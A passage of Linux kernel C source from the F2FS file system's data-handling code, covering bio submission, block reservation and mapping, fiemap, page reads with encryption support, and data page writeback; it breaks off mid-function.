if (!test_opt(sbi, NOBARRIER))
io->fio.op_flags |= REQ_FUA;
}
__submit_merged_bio(io);
out:
up_write(&io->io_rwsem);
}
void f2fs_submit_merged_bio(struct f2fs_sb_info *sbi, enum page_type type,
int rw)
{
__f2fs_submit_merged_bio(sbi, NULL, NULL, 0, type, rw);
}
void f2fs_submit_merged_bio_cond(struct f2fs_sb_info *sbi,
struct inode *inode, struct page *page,
nid_t ino, enum page_type type, int rw)
{
if (has_merged_page(sbi, inode, page, ino, type))
__f2fs_submit_merged_bio(sbi, inode, page, ino, type, rw);
}
void f2fs_flush_merged_bios(struct f2fs_sb_info *sbi)
{
f2fs_submit_merged_bio(sbi, DATA, WRITE);
f2fs_submit_merged_bio(sbi, NODE, WRITE);
f2fs_submit_merged_bio(sbi, META, WRITE);
}
/*
* Fill the locked page with data located in the block address.
* Return unlocked page.
*/
int f2fs_submit_page_bio(struct f2fs_io_info *fio)
{
struct bio *bio;
struct page *page = fio->encrypted_page ?
fio->encrypted_page : fio->page;
trace_f2fs_submit_page_bio(page, fio);
f2fs_trace_ios(fio, 0);
/* Allocate a new bio */
bio = __bio_alloc(fio->sbi, fio->new_blkaddr, 1, is_read_io(fio->op));
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE) {
bio_put(bio);
return -EFAULT;
}
bio_set_op_attrs(bio, fio->op, fio->op_flags);
__submit_bio(fio->sbi, bio, fio->type);
return 0;
}
int f2fs_submit_page_mbio(struct f2fs_io_info *fio)
{
struct f2fs_sb_info *sbi = fio->sbi;
enum page_type btype = PAGE_TYPE_OF_BIO(fio->type);
struct f2fs_bio_info *io;
bool is_read = is_read_io(fio->op);
struct page *bio_page;
int err = 0;
io = is_read ? &sbi->read_io : &sbi->write_io[btype];
if (fio->old_blkaddr != NEW_ADDR)
verify_block_addr(sbi, fio->old_blkaddr);
verify_block_addr(sbi, fio->new_blkaddr);
bio_page = fio->encrypted_page ? fio->encrypted_page : fio->page;
if (!is_read)
inc_page_count(sbi, WB_DATA_TYPE(bio_page));
down_write(&io->io_rwsem);
if (io->bio && (io->last_block_in_bio != fio->new_blkaddr - 1 ||
(io->fio.op != fio->op || io->fio.op_flags != fio->op_flags) ||
!__same_bdev(sbi, fio->new_blkaddr, io->bio)))
__submit_merged_bio(io);
alloc_new:
if (io->bio == NULL) {
if ((fio->type == DATA || fio->type == NODE) &&
fio->new_blkaddr & F2FS_IO_SIZE_MASK(sbi)) {
err = -EAGAIN;
dec_page_count(sbi, WB_DATA_TYPE(bio_page));
goto out_fail;
}
io->bio = __bio_alloc(sbi, fio->new_blkaddr,
BIO_MAX_PAGES, is_read);
io->fio = *fio;
}
if (bio_add_page(io->bio, bio_page, PAGE_SIZE, 0) <
PAGE_SIZE) {
__submit_merged_bio(io);
goto alloc_new;
}
io->last_block_in_bio = fio->new_blkaddr;
f2fs_trace_ios(fio, 0);
out_fail:
up_write(&io->io_rwsem);
trace_f2fs_submit_page_mbio(fio->page, fio);
return err;
}
static void __set_data_blkaddr(struct dnode_of_data *dn)
{
struct f2fs_node *rn = F2FS_NODE(dn->node_page);
__le32 *addr_array;
/* Get physical address of data block */
addr_array = blkaddr_in_node(rn);
addr_array[dn->ofs_in_node] = cpu_to_le32(dn->data_blkaddr);
}
/*
* Lock ordering for the change of data block address:
* ->data_page
* ->node_page
* update block addresses in the node page
*/
void set_data_blkaddr(struct dnode_of_data *dn)
{
f2fs_wait_on_page_writeback(dn->node_page, NODE, true);
__set_data_blkaddr(dn);
if (set_page_dirty(dn->node_page))
dn->node_changed = true;
}
void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
{
dn->data_blkaddr = blkaddr;
set_data_blkaddr(dn);
f2fs_update_extent_cache(dn);
}
/* dn->ofs_in_node will be returned with up-to-date last block pointer */
int reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
if (!count)
return 0;
if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
return -EPERM;
if (unlikely(!inc_valid_block_count(sbi, dn->inode, &count)))
return -ENOSPC;
trace_f2fs_reserve_new_blocks(dn->inode, dn->nid,
dn->ofs_in_node, count);
f2fs_wait_on_page_writeback(dn->node_page, NODE, true);
for (; count > 0; dn->ofs_in_node++) {
block_t blkaddr =
datablock_addr(dn->node_page, dn->ofs_in_node);
if (blkaddr == NULL_ADDR) {
dn->data_blkaddr = NEW_ADDR;
__set_data_blkaddr(dn);
count--;
}
}
if (set_page_dirty(dn->node_page))
dn->node_changed = true;
return 0;
}
/* Should keep dn->ofs_in_node unchanged */
int reserve_new_block(struct dnode_of_data *dn)
{
unsigned int ofs_in_node = dn->ofs_in_node;
int ret;
ret = reserve_new_blocks(dn, 1);
dn->ofs_in_node = ofs_in_node;
return ret;
}
int f2fs_reserve_block(struct dnode_of_data *dn, pgoff_t index)
{
bool need_put = dn->inode_page ? false : true;
int err;
err = get_dnode_of_data(dn, index, ALLOC_NODE);
if (err)
return err;
if (dn->data_blkaddr == NULL_ADDR)
err = reserve_new_block(dn);
if (err || need_put)
f2fs_put_dnode(dn);
return err;
}
int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index)
{
struct extent_info ei;
struct inode *inode = dn->inode;
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn->data_blkaddr = ei.blk + index - ei.fofs;
return 0;
}
return f2fs_reserve_block(dn, index);
}
struct page *get_read_data_page(struct inode *inode, pgoff_t index,
int op_flags, bool for_write)
{
struct address_space *mapping = inode->i_mapping;
struct dnode_of_data dn;
struct page *page;
struct extent_info ei;
int err;
struct f2fs_io_info fio = {
.sbi = F2FS_I_SB(inode),
.type = DATA,
.op = REQ_OP_READ,
.op_flags = op_flags,
.encrypted_page = NULL,
};
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode))
return read_mapping_page(mapping, index, NULL);
page = f2fs_grab_cache_page(mapping, index, for_write);
if (!page)
return ERR_PTR(-ENOMEM);
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn.data_blkaddr = ei.blk + index - ei.fofs;
goto got_it;
}
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, index, LOOKUP_NODE);
if (err)
goto put_err;
f2fs_put_dnode(&dn);
if (unlikely(dn.data_blkaddr == NULL_ADDR)) {
err = -ENOENT;
goto put_err;
}
got_it:
if (PageUptodate(page)) {
unlock_page(page);
return page;
}
/*
* A new dentry page is allocated but not able to be written, since its
* new inode page couldn't be allocated due to -ENOSPC.
* In such the case, its blkaddr can be remained as NEW_ADDR.
* see, f2fs_add_link -> get_new_data_page -> init_inode_metadata.
*/
if (dn.data_blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
unlock_page(page);
return page;
}
fio.new_blkaddr = fio.old_blkaddr = dn.data_blkaddr;
fio.page = page;
err = f2fs_submit_page_bio(&fio);
if (err)
goto put_err;
return page;
put_err:
f2fs_put_page(page, 1);
return ERR_PTR(err);
}
struct page *find_data_page(struct inode *inode, pgoff_t index)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
page = find_get_page(mapping, index);
if (page && PageUptodate(page))
return page;
f2fs_put_page(page, 0);
page = get_read_data_page(inode, index, 0, false);
if (IS_ERR(page))
return page;
if (PageUptodate(page))
return page;
wait_on_page_locked(page);
if (unlikely(!PageUptodate(page))) {
f2fs_put_page(page, 0);
return ERR_PTR(-EIO);
}
return page;
}
/*
* If it tries to access a hole, return an error.
* Because, the callers, functions in dir.c and GC, should be able to know
* whether this page exists or not.
*/
struct page *get_lock_data_page(struct inode *inode, pgoff_t index,
bool for_write)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
repeat:
page = get_read_data_page(inode, index, 0, for_write);
if (IS_ERR(page))
return page;
/* wait for read completion */
lock_page(page);
if (unlikely(page->mapping != mapping)) {
f2fs_put_page(page, 1);
goto repeat;
}
if (unlikely(!PageUptodate(page))) {
f2fs_put_page(page, 1);
return ERR_PTR(-EIO);
}
return page;
}
/*
* Caller ensures that this data page is never allocated.
* A new zero-filled data page is allocated in the page cache.
*
* Also, caller should grab and release a rwsem by calling f2fs_lock_op() and
* f2fs_unlock_op().
* Note that, ipage is set only by make_empty_dir, and if any error occur,
* ipage should be released by this function.
*/
struct page *get_new_data_page(struct inode *inode,
struct page *ipage, pgoff_t index, bool new_i_size)
{
struct address_space *mapping = inode->i_mapping;
struct page *page;
struct dnode_of_data dn;
int err;
page = f2fs_grab_cache_page(mapping, index, true);
if (!page) {
/*
* before exiting, we should make sure ipage will be released
* if any error occur.
*/
f2fs_put_page(ipage, 1);
return ERR_PTR(-ENOMEM);
}
set_new_dnode(&dn, inode, ipage, NULL, 0);
err = f2fs_reserve_block(&dn, index);
if (err) {
f2fs_put_page(page, 1);
return ERR_PTR(err);
}
if (!ipage)
f2fs_put_dnode(&dn);
if (PageUptodate(page))
goto got_it;
if (dn.data_blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
} else {
f2fs_put_page(page, 1);
/* if ipage exists, blkaddr should be NEW_ADDR */
f2fs_bug_on(F2FS_I_SB(inode), ipage);
page = get_lock_data_page(inode, index, true);
if (IS_ERR(page))
return page;
}
got_it:
if (new_i_size && i_size_read(inode) <
((loff_t)(index + 1) << PAGE_SHIFT))
f2fs_i_size_write(inode, ((loff_t)(index + 1) << PAGE_SHIFT));
return page;
}
static int __allocate_data_block(struct dnode_of_data *dn)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
struct f2fs_summary sum;
struct node_info ni;
pgoff_t fofs;
blkcnt_t count = 1;
if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
return -EPERM;
dn->data_blkaddr = datablock_addr(dn->node_page, dn->ofs_in_node);
if (dn->data_blkaddr == NEW_ADDR)
goto alloc;
if (unlikely(!inc_valid_block_count(sbi, dn->inode, &count)))
return -ENOSPC;
alloc:
get_node_info(sbi, dn->nid, &ni);
set_summary(&sum, dn->nid, dn->ofs_in_node, ni.version);
allocate_data_block(sbi, NULL, dn->data_blkaddr, &dn->data_blkaddr,
&sum, CURSEG_WARM_DATA);
set_data_blkaddr(dn);
/* update i_size */
fofs = start_bidx_of_node(ofs_of_node(dn->node_page), dn->inode) +
dn->ofs_in_node;
if (i_size_read(dn->inode) < ((loff_t)(fofs + 1) << PAGE_SHIFT))
f2fs_i_size_write(dn->inode,
((loff_t)(fofs + 1) << PAGE_SHIFT));
return 0;
}
static inline bool __force_buffered_io(struct inode *inode, int rw)
{
return ((f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) ||
(rw == WRITE && test_opt(F2FS_I_SB(inode), LFS)) ||
F2FS_I_SB(inode)->s_ndevs);
}
int f2fs_preallocate_blocks(struct kiocb *iocb, struct iov_iter *from)
{
struct inode *inode = file_inode(iocb->ki_filp);
struct f2fs_map_blocks map;
int err = 0;
if (is_inode_flag_set(inode, FI_NO_PREALLOC))
return 0;
map.m_lblk = F2FS_BLK_ALIGN(iocb->ki_pos);
map.m_len = F2FS_BYTES_TO_BLK(iocb->ki_pos + iov_iter_count(from));
if (map.m_len > map.m_lblk)
map.m_len -= map.m_lblk;
else
map.m_len = 0;
map.m_next_pgofs = NULL;
if (iocb->ki_flags & IOCB_DIRECT) {
err = f2fs_convert_inline_inode(inode);
if (err)
return err;
return f2fs_map_blocks(inode, &map, 1,
__force_buffered_io(inode, WRITE) ?
F2FS_GET_BLOCK_PRE_AIO :
F2FS_GET_BLOCK_PRE_DIO);
}
if (iocb->ki_pos + iov_iter_count(from) > MAX_INLINE_DATA) {
err = f2fs_convert_inline_inode(inode);
if (err)
return err;
}
if (!f2fs_has_inline_data(inode))
return f2fs_map_blocks(inode, &map, 1, F2FS_GET_BLOCK_PRE_AIO);
return err;
}
/*
* f2fs_map_blocks() now supported readahead/bmap/rw direct_IO with
* f2fs_map_blocks structure.
* If original data blocks are allocated, then give them to blockdev.
* Otherwise,
* a. preallocate requested block addresses
* b. do not use extent cache for better performance
* c. give the block addresses to blockdev
*/
int f2fs_map_blocks(struct inode *inode, struct f2fs_map_blocks *map,
int create, int flag)
{
unsigned int maxblocks = map->m_len;
struct dnode_of_data dn;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
int mode = create ? ALLOC_NODE : LOOKUP_NODE;
pgoff_t pgofs, end_offset, end;
int err = 0, ofs = 1;
unsigned int ofs_in_node, last_ofs_in_node;
blkcnt_t prealloc;
struct extent_info ei;
block_t blkaddr;
if (!maxblocks)
return 0;
map->m_len = 0;
map->m_flags = 0;
/* it only supports block size == page size */
pgofs = (pgoff_t)map->m_lblk;
end = pgofs + maxblocks;
if (!create && f2fs_lookup_extent_cache(inode, pgofs, &ei)) {
map->m_pblk = ei.blk + pgofs - ei.fofs;
map->m_len = min((pgoff_t)maxblocks, ei.fofs + ei.len - pgofs);
map->m_flags = F2FS_MAP_MAPPED;
goto out;
}
next_dnode:
if (create)
f2fs_lock_op(sbi);
/* When reading holes, we need its node page */
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, pgofs, mode);
if (err) {
if (flag == F2FS_GET_BLOCK_BMAP)
map->m_pblk = 0;
if (err == -ENOENT) {
err = 0;
if (map->m_next_pgofs)
*map->m_next_pgofs =
get_next_page_offset(&dn, pgofs);
}
goto unlock_out;
}
prealloc = 0;
last_ofs_in_node = ofs_in_node = dn.ofs_in_node;
end_offset = ADDRS_PER_PAGE(dn.node_page, inode);
next_block:
blkaddr = datablock_addr(dn.node_page, dn.ofs_in_node);
if (blkaddr == NEW_ADDR || blkaddr == NULL_ADDR) {
if (create) {
if (unlikely(f2fs_cp_error(sbi))) {
err = -EIO;
goto sync_out;
}
if (flag == F2FS_GET_BLOCK_PRE_AIO) {
if (blkaddr == NULL_ADDR) {
prealloc++;
last_ofs_in_node = dn.ofs_in_node;
}
} else {
err = __allocate_data_block(&dn);
if (!err)
set_inode_flag(inode, FI_APPEND_WRITE);
}
if (err)
goto sync_out;
map->m_flags = F2FS_MAP_NEW;
blkaddr = dn.data_blkaddr;
} else {
if (flag == F2FS_GET_BLOCK_BMAP) {
map->m_pblk = 0;
goto sync_out;
}
if (flag == F2FS_GET_BLOCK_FIEMAP &&
blkaddr == NULL_ADDR) {
if (map->m_next_pgofs)
*map->m_next_pgofs = pgofs + 1;
}
if (flag != F2FS_GET_BLOCK_FIEMAP ||
blkaddr != NEW_ADDR)
goto sync_out;
}
}
if (flag == F2FS_GET_BLOCK_PRE_AIO)
goto skip;
if (map->m_len == 0) {
/* preallocated unwritten block should be mapped for fiemap. */
if (blkaddr == NEW_ADDR)
map->m_flags |= F2FS_MAP_UNWRITTEN;
map->m_flags |= F2FS_MAP_MAPPED;
map->m_pblk = blkaddr;
map->m_len = 1;
} else if ((map->m_pblk != NEW_ADDR &&
blkaddr == (map->m_pblk + ofs)) ||
(map->m_pblk == NEW_ADDR && blkaddr == NEW_ADDR) ||
flag == F2FS_GET_BLOCK_PRE_DIO) {
ofs++;
map->m_len++;
} else {
goto sync_out;
}
skip:
dn.ofs_in_node++;
pgofs++;
/* preallocate blocks in batch for one dnode page */
if (flag == F2FS_GET_BLOCK_PRE_AIO &&
(pgofs == end || dn.ofs_in_node == end_offset)) {
dn.ofs_in_node = ofs_in_node;
err = reserve_new_blocks(&dn, prealloc);
if (err)
goto sync_out;
map->m_len += dn.ofs_in_node - ofs_in_node;
if (prealloc && dn.ofs_in_node != last_ofs_in_node + 1) {
err = -ENOSPC;
goto sync_out;
}
dn.ofs_in_node = end_offset;
}
if (pgofs >= end)
goto sync_out;
else if (dn.ofs_in_node < end_offset)
goto next_block;
f2fs_put_dnode(&dn);
if (create) {
f2fs_unlock_op(sbi);
f2fs_balance_fs(sbi, dn.node_changed);
}
goto next_dnode;
sync_out:
f2fs_put_dnode(&dn);
unlock_out:
if (create) {
f2fs_unlock_op(sbi);
f2fs_balance_fs(sbi, dn.node_changed);
}
out:
trace_f2fs_map_blocks(inode, map, err);
return err;
}
static int __get_data_block(struct inode *inode, sector_t iblock,
struct buffer_head *bh, int create, int flag,
pgoff_t *next_pgofs)
{
struct f2fs_map_blocks map;
int err;
map.m_lblk = iblock;
map.m_len = bh->b_size >> inode->i_blkbits;
map.m_next_pgofs = next_pgofs;
err = f2fs_map_blocks(inode, &map, create, flag);
if (!err) {
map_bh(bh, inode->i_sb, map.m_pblk);
bh->b_state = (bh->b_state & ~F2FS_MAP_FLAGS) | map.m_flags;
bh->b_size = (u64)map.m_len << inode->i_blkbits;
}
return err;
}
static int get_data_block(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create, int flag,
pgoff_t *next_pgofs)
{
return __get_data_block(inode, iblock, bh_result, create,
flag, next_pgofs);
}
static int get_data_block_dio(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create)
{
return __get_data_block(inode, iblock, bh_result, create,
F2FS_GET_BLOCK_DIO, NULL);
}
static int get_data_block_bmap(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create)
{
/* Block number less than F2FS MAX BLOCKS */
if (unlikely(iblock >= F2FS_I_SB(inode)->max_file_blocks))
return -EFBIG;
return __get_data_block(inode, iblock, bh_result, create,
F2FS_GET_BLOCK_BMAP, NULL);
}
static inline sector_t logical_to_blk(struct inode *inode, loff_t offset)
{
return (offset >> inode->i_blkbits);
}
static inline loff_t blk_to_logical(struct inode *inode, sector_t blk)
{
return (blk << inode->i_blkbits);
}
int f2fs_fiemap(struct inode *inode, struct fiemap_extent_info *fieinfo,
u64 start, u64 len)
{
struct buffer_head map_bh;
sector_t start_blk, last_blk;
pgoff_t next_pgofs;
u64 logical = 0, phys = 0, size = 0;
u32 flags = 0;
int ret = 0;
ret = fiemap_check_flags(fieinfo, FIEMAP_FLAG_SYNC);
if (ret)
return ret;
if (f2fs_has_inline_data(inode)) {
ret = f2fs_inline_data_fiemap(inode, fieinfo, start, len);
if (ret != -EAGAIN)
return ret;
}
inode_lock(inode);
if (logical_to_blk(inode, len) == 0)
len = blk_to_logical(inode, 1);
start_blk = logical_to_blk(inode, start);
last_blk = logical_to_blk(inode, start + len - 1);
next:
memset(&map_bh, 0, sizeof(struct buffer_head));
map_bh.b_size = len;
ret = get_data_block(inode, start_blk, &map_bh, 0,
F2FS_GET_BLOCK_FIEMAP, &next_pgofs);
if (ret)
goto out;
/* HOLE */
if (!buffer_mapped(&map_bh)) {
start_blk = next_pgofs;
if (blk_to_logical(inode, start_blk) < blk_to_logical(inode,
F2FS_I_SB(inode)->max_file_blocks))
goto prep_next;
flags |= FIEMAP_EXTENT_LAST;
}
if (size) {
if (f2fs_encrypted_inode(inode))
flags |= FIEMAP_EXTENT_DATA_ENCRYPTED;
ret = fiemap_fill_next_extent(fieinfo, logical,
phys, size, flags);
}
if (start_blk > last_blk || ret)
goto out;
logical = blk_to_logical(inode, start_blk);
phys = blk_to_logical(inode, map_bh.b_blocknr);
size = map_bh.b_size;
flags = 0;
if (buffer_unwritten(&map_bh))
flags = FIEMAP_EXTENT_UNWRITTEN;
start_blk += logical_to_blk(inode, size);
prep_next:
cond_resched();
if (fatal_signal_pending(current))
ret = -EINTR;
else
goto next;
out:
if (ret == 1)
ret = 0;
inode_unlock(inode);
return ret;
}
static struct bio *f2fs_grab_bio(struct inode *inode, block_t blkaddr,
unsigned nr_pages)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct fscrypt_ctx *ctx = NULL;
struct bio *bio;
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) {
ctx = fscrypt_get_ctx(inode, GFP_NOFS);
if (IS_ERR(ctx))
return ERR_CAST(ctx);
/* wait the page to be moved by cleaning */
f2fs_wait_on_encrypted_page_writeback(sbi, blkaddr);
}
bio = bio_alloc(GFP_KERNEL, min_t(int, nr_pages, BIO_MAX_PAGES));
if (!bio) {
if (ctx)
fscrypt_release_ctx(ctx);
return ERR_PTR(-ENOMEM);
}
f2fs_target_device(sbi, blkaddr, bio);
bio->bi_end_io = f2fs_read_end_io;
bio->bi_private = ctx;
return bio;
}
/*
* This function was originally taken from fs/mpage.c, and customized for f2fs.
* Major change was from block_size == page_size in f2fs by default.
*/
static int f2fs_mpage_readpages(struct address_space *mapping,
struct list_head *pages, struct page *page,
unsigned nr_pages)
{
struct bio *bio = NULL;
unsigned page_idx;
sector_t last_block_in_bio = 0;
struct inode *inode = mapping->host;
const unsigned blkbits = inode->i_blkbits;
const unsigned blocksize = 1 << blkbits;
sector_t block_in_file;
sector_t last_block;
sector_t last_block_in_file;
sector_t block_nr;
struct f2fs_map_blocks map;
map.m_pblk = 0;
map.m_lblk = 0;
map.m_len = 0;
map.m_flags = 0;
map.m_next_pgofs = NULL;
for (page_idx = 0; nr_pages; page_idx++, nr_pages--) {
prefetchw(&page->flags);
if (pages) {
page = list_last_entry(pages, struct page, lru);
list_del(&page->lru);
if (add_to_page_cache_lru(page, mapping,
page->index,
readahead_gfp_mask(mapping)))
goto next_page;
}
block_in_file = (sector_t)page->index;
last_block = block_in_file + nr_pages;
last_block_in_file = (i_size_read(inode) + blocksize - 1) >>
blkbits;
if (last_block > last_block_in_file)
last_block = last_block_in_file;
/*
* Map blocks using the previous result first.
*/
if ((map.m_flags & F2FS_MAP_MAPPED) &&
block_in_file > map.m_lblk &&
block_in_file < (map.m_lblk + map.m_len))
goto got_it;
/*
* Then do more f2fs_map_blocks() calls until we are
* done with this page.
*/
map.m_flags = 0;
if (block_in_file < last_block) {
map.m_lblk = block_in_file;
map.m_len = last_block - block_in_file;
if (f2fs_map_blocks(inode, &map, 0,
F2FS_GET_BLOCK_READ))
goto set_error_page;
}
got_it:
if ((map.m_flags & F2FS_MAP_MAPPED)) {
block_nr = map.m_pblk + block_in_file - map.m_lblk;
SetPageMappedToDisk(page);
if (!PageUptodate(page) && !cleancache_get_page(page)) {
SetPageUptodate(page);
goto confused;
}
} else {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
unlock_page(page);
goto next_page;
}
/*
* This page will go to BIO. Do we need to send this
* BIO off first?
*/
if (bio && (last_block_in_bio != block_nr - 1 ||
!__same_bdev(F2FS_I_SB(inode), block_nr, bio))) {
submit_and_realloc:
__submit_bio(F2FS_I_SB(inode), bio, DATA);
bio = NULL;
}
if (bio == NULL) {
bio = f2fs_grab_bio(inode, block_nr, nr_pages);
if (IS_ERR(bio)) {
bio = NULL;
goto set_error_page;
}
bio_set_op_attrs(bio, REQ_OP_READ, 0);
}
if (bio_add_page(bio, page, blocksize, 0) < blocksize)
goto submit_and_realloc;
last_block_in_bio = block_nr;
goto next_page;
set_error_page:
SetPageError(page);
zero_user_segment(page, 0, PAGE_SIZE);
unlock_page(page);
goto next_page;
confused:
if (bio) {
__submit_bio(F2FS_I_SB(inode), bio, DATA);
bio = NULL;
}
unlock_page(page);
next_page:
if (pages)
put_page(page);
}
BUG_ON(pages && !list_empty(pages));
if (bio)
__submit_bio(F2FS_I_SB(inode), bio, DATA);
return 0;
}
static int f2fs_read_data_page(struct file *file, struct page *page)
{
struct inode *inode = page->mapping->host;
int ret = -EAGAIN;
trace_f2fs_readpage(page, DATA);
/* If the file has inline data, try to read it directly */
if (f2fs_has_inline_data(inode))
ret = f2fs_read_inline_data(inode, page);
if (ret == -EAGAIN)
ret = f2fs_mpage_readpages(page->mapping, NULL, page, 1);
return ret;
}
static int f2fs_read_data_pages(struct file *file,
struct address_space *mapping,
struct list_head *pages, unsigned nr_pages)
{
struct inode *inode = file->f_mapping->host;
struct page *page = list_last_entry(pages, struct page, lru);
trace_f2fs_readpages(inode, page, nr_pages);
/* If the file has inline data, skip readpages */
if (f2fs_has_inline_data(inode))
return 0;
return f2fs_mpage_readpages(mapping, pages, NULL, nr_pages);
}
int do_write_data_page(struct f2fs_io_info *fio)
{
struct page *page = fio->page;
struct inode *inode = page->mapping->host;
struct dnode_of_data dn;
int err = 0;
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, page->index, LOOKUP_NODE);
if (err)
return err;
fio->old_blkaddr = dn.data_blkaddr;
/* This page is already truncated */
if (fio->old_blkaddr == NULL_ADDR) {
ClearPageUptodate(page);
goto out_writepage;
}
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) {
gfp_t gfp_flags = GFP_NOFS;
/* wait for GCed encrypted page writeback */
f2fs_wait_on_encrypted_page_writeback(F2FS_I_SB(inode),
fio->old_blkaddr);
retry_encrypt:
fio->encrypted_page = fscrypt_encrypt_page(inode, fio->page,
PAGE_SIZE, 0,
fio->page->index,
gfp_flags);
if (IS_ERR(fio->encrypted_page)) {
err = PTR_ERR(fio->encrypted_page);
if (err == -ENOMEM) {
/* flush pending ios and wait for a while */
f2fs_flush_merged_bios(F2FS_I_SB(inode));
congestion_wait(BLK_RW_ASYNC, HZ/50);
gfp_flags |= __GFP_NOFAIL;
err = 0;
goto retry_encrypt;
}
goto out_writepage;
}
}
set_page_writeback(page);
/*
* If current allocation needs SSR,
* it had better in-place writes for updated data.
*/
if (unlikely(fio->old_blkaddr != NEW_ADDR &&
!is_cold_data(page) &&
!IS_ATOMIC_WRITTEN_PAGE(page) &&
need_inplace_update(inode))) {
rewrite_data_page(fio);
set_inode_flag(inode, FI_UPDATE_WRITE);
trace_f2fs_do_write_data_page(page, IPU);
} else {
write_data_page(&dn, fio);
trace_f2fs_do_write_data_page(page, OPU);
set_inode_flag(inode, FI_APPEND_WRITE);
if (page->index == 0)
set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
}
out_writepage:
f2fs_put_dnode(&dn);
return err;
}
static int f2fs_write_data_page(struct page *page,
struct writeback_control *wbc)
{
struct inode *inode = page->mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
loff_t i_size = i_size_read(inode);
const pgoff_t end_index = ((unsigned long long) i_size)
>> PAGE_SHIFT;
loff_t psize = (page->index + 1) << PAGE_SHIFT;
unsigned offset = 0;
bool need_balance_fs = false;
int err = 0;
struct f2fs_io_info fio = {
.sbi = sbi,
.type = DATA,
.op = REQ_OP_WRITE,
.op_flags = wbc_to_write_flags(wbc),
.page = page,
.encrypted_page = NULL,
};
trace_f2fs_writepage(page, DATA);
if (page->index < end_index)
goto write;
/*
* If the offset is out-of-range of file size,
* this page does not have to be written to disk.
*/
offset = i_size & (PAGE_SIZE - 1);
if ((page->index >= end_index + 1) || !offset)
goto out;
zero_user_segment(page, offset, PAGE_SIZE);
write:
if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
goto redirty_out;
if (f2fs_is_drop_cache(inode))
goto out;
/* we should not write 0'th page having journal header */
if (f2fs_is_volatile_file(inode) && (!page->index ||
(!wbc->for_reclaim &&
available_free_memory(sbi, BASE_CHECK))))
goto redirty_out;
/* we should bypass data pages to proceed the kworkder jobs */
if (unlikely(f2fs_cp_error(sbi))) {
mapping_set_error(page->mapping, -EIO);
goto out;
}
/* Dentry blocks are controlled by checkpoint */
if (S_ISDIR(inode->i_mode)) {
err = do_write_data_page(&fio);
goto done;
}
if (!wbc->for_reclaim)
need_balance_fs = true;
else if (has_not_enough_free_secs(sbi, 0, 0))
goto redirty_out;
err = -EAGAIN;
f2fs_lock_op(sbi);
if (f2fs_has_inline_data(inode))
err = f2fs_write_inline_data(inode, page);
if (err == -EAGAIN)
err = do_write_data_page(&fio);
if (F2FS_I(inode)->last_disk_size < psize)
F2FS_I(inode)->last_disk_size = psize;
f2fs_unlock_op(sbi);
done:
if (err && err != -ENOENT)
goto redirty_out;
out:
inode_dec_dirty_pages(inode);
if (err)
ClearPageUptodate(page);
if (wbc->for_reclaim) {
f2fs_submit_merged_bio_cond(sbi, NULL, page, 0, DATA, WRITE);
remove_dirty_inode(inode);
}
unlock_page(page);
f2fs_balance_fs(sbi, need_balance_fs);
if (unlikely(f2fs_cp_error(sbi)))
f2fs_submit_merged_bio(sbi, DATA, WRITE);
return 0;
redirty_out:
redirty_page_for_writepage(wbc, page);
if (!err)
return AOP_WRITEPAGE_ACTIVATE;
unlock_page(page);
return err;
}
/*
* This function was copied from write_cche_pages from mm/page-writeback.c.
* The major change is making write step of cold data page separately from
* warm/hot data page.
*/
static int f2fs_write_cache_pages(struct address_space *mapping,
struct writeback_control *wbc)
{
int ret = 0;
int done = 0;
struct pagevec pvec;
int nr_pages;
pgoff_t uninitialized_var(writeback_index);
pgoff_t index;
pgoff_t end; /* Inclusive */
pgoff_t done_index;
int cycled;
int range_whole = 0;
int tag;
int nwritten = 0;
pagevec_init(&pvec, 0);
if (wbc->range_cyclic) {
writeback_index = mapping->writeback_index; /* prev offset */
index = writeback_index;
if (index == 0)
cycled = 1;
else
cycled = 0;
end = -1;
} else {
index = wbc->range_start >> PAGE_SHIFT;
end = wbc->range_end >> PAGE_SHIFT;
if (wbc->range_start == 0 && wbc->range_end == LLONG_MAX)
range_whole = 1;
cycled = 1; /* ignore range_cyclic tests */
}
if (wbc->sync_mode == WB_SYNC_ALL || wbc->tagged_writepages)
tag = PAGECACHE_TAG_TOWRITE;
else
tag = PAGECACHE_TAG_DIRTY;
retry:
if (wbc->sync_mode == WB_SYNC_ALL || wbc->tagged_writepages)
tag_pages_for_writeback(mapping, index, end);
done_index = index;
while (!done && (index <= end)) {
int i;
nr_pages = pagevec_lookup_tag(&pvec, mapping, &index, tag,
min(end - index, (pgoff_t)PAGEVEC_SIZE - 1) + 1);
if (nr_pages == 0)
break;
for (i = 0; i < nr_pages; i++) {
struct page *page = pvec.pages[i];
